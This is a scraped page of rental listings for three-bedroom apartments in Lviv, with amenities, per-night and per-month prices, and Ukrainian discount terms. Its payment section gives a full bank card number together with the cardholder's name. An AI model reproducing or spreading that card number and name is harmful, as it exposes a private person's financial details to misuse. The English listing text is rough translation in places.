3 - bedroom apartment on the Kostomarova street

3 - bedroom apartment on the Kostomarova street

Characteristics of the apartment:
- All appliances
- Telephone
- Cable TV
- Reinforced door
- Individual Heating
- Hot / cold water
- The Internet
- 8 (2 + 2 + 2 + 1 + 1) sleeping places

3-bedroom apartment in a good area, close to the city center. Сustom design. Constant hot / cold water. Rent apartments. Comfort and convenience are guaranteed.

Price per night:
1600 грн

Price per month:
700$

more   


3 - bedroom apartment on the Іvana Franka street

3 - bedroom apartment on the Іvana Franka street

Characteristics of the apartment:
- All appliances
- Telephone
- Reinforced door
- Satellite TV
- Individual Heating
- Hot / cold water
- 6 (2 + 2 + 1 + 1) sleeping places

Rent for  3 room apartment in a good area. All Home Appliances, TV satellites. Beautiful design. This apartment  good variant for you!

Price per night:
1400 грн

Price per month:
600$

more   


3 - room apartment on Dudayev street

3 - room apartment on Dudayev street

Characteristics of the apartment:
- All appliances
- Telephone
- Reinforced door
- Satellite TV
- Individual Heating
- Hot / cold water
- The Internet
- 8 (2 + 2 + 2 + 2) sleeping places

Rent apartment renovated, comfortable layou available everything you need. 4 2х  beds allow you to stay as comfortable as possible. available internet, constant hot water and all appliances.

Price per night:
1500 грн.

Price per month:
600$

more   


3 - bedroom apartment on the Archipenko street

3 - bedroom apartment on the Archipenko street

Characteristics of apartments:
- Reinforced door
- Oven
- Refrigerator
- Washing Machine
- Satellite TV
- Heating Yndyvydualnoe
- Hot / cold water constantly
- 6  (2 + 2 + 2) sleeping places

3 room Rent apartments in Lviv. Not far from the city center. Available plase to park the car. All  for comfortable residence. Available satellite tv.

Price per night:
1300 грн

Price per month:
не сдается на месяц

more   


3 - bedroom apartment on Rynok plase

3 - bedroom apartment on Rynok plase

Characteristics of the apartment:
- Reinforced door
- Gas stove
- Refrigerator
- Washing machine
- Satellite TV
- Individual Heating
- Hot / cold water
- 6 (2 + 2 + 2) sleeping places
 
3-bedroom apartment in the historic center of the city. Is near the Town Hall, City Council, Dominican Church, and many museums. Beautiful views okna.Sdavaemaya apartment is a good option for you if you want to stay comfortable in Lviv.

Price per night:
1500 грн

Price per month:
650$

more   Гнучка система знижок:

Оренда квартири більш 10 діб
ЗНИЖКА 10%

Повторна оренда квартири
ЗНИЖКА 10%

Гарячі пропозиції
ЗНИЖКА 20%
Зверніть увагу:

У разі якщо більше 5ти людей заселяється в квартиру - тарифікація не за квартиру а за людину: по 200грн.

Номер банківської карти: 5168 7423 5978 6906 Галай Світлана Степанівна.

На вихідні дні мінімальне бронювання 2 доби.


Доступна оплата кредиткою!
Make-a-Payment
(/yams-select:98)